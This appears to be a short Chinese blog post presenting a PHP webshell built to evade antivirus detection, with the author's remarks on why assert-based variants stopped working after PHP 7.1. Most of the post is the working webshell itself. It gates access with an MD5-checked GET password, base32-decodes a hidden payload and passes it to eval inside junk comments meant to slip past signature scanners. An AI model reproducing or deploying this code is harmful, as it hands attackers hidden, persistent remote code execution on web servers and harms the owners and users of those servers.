security - 一句话免杀 php webshell anti-virus virustotal.com

访问量: 369

这个简直太强大了

一直以来我以为无法过是因为 eval 的原因, 看了很多免杀,都是使用assert

php 7.1 以后就无法使用assert 了。

所以看起来还是没问题的。

估计以后 使用自行加密、解密的方式是绕过的主流

<?php
class PLRN{
  public $DLUG = null;
  public $FVRE = null;
  function __construct(){
    if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
      $this->DLUG = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
      $this->FVRE = @XGAV($this->DLUG);
      @eval("/*M]Eq[%e*/".$this->FVRE."/*M]Eq[%e*/");
    }
  }
}
new PLRN();
function NXUM($NHML){
    $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
    $DTSE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($NHML); $i < $j; $i++){
    $v <<= 8;
        $v += ord($NHML[$i]);
        $vbits += 8;
        while ($vbits >= 5) {
            $vbits -= 5;
            $DTSE .= $BASE32_ALPHABET[$v >> $vbits];
            $v &= ((1 << $vbits) - 1);}}
    if ($vbits > 0){
        $v <<= (5 - $vbits);
        $DTSE .= $BASE32_ALPHABET[$v];}
    return $DTSE;}
function XGAV($NHML){
    $DTSE = '';
    $v = 0;
    $vbits = 0;
    for ($i = 0, $j = strlen($NHML); $i < $j; $i++){
        $v <<= 5;
        if ($NHML[$i] >= 'a' && $NHML[$i] <= 'z'){
            $v += (ord($NHML[$i]) - 97);
        } elseif ($NHML[$i] >= '2' && $NHML[$i] <= '7') {
            $v += (24 + $NHML[$i]);
        } else {
            exit(1);
        }
        $vbits += 5;
        while ($vbits >= 8){
            $vbits -= 8;
            $DTSE .= chr($v >> $vbits);
            $v &= ((1 << $vbits) - 1);}}
    return $DTSE;}
?>

订阅/RSS Feed

Subscribe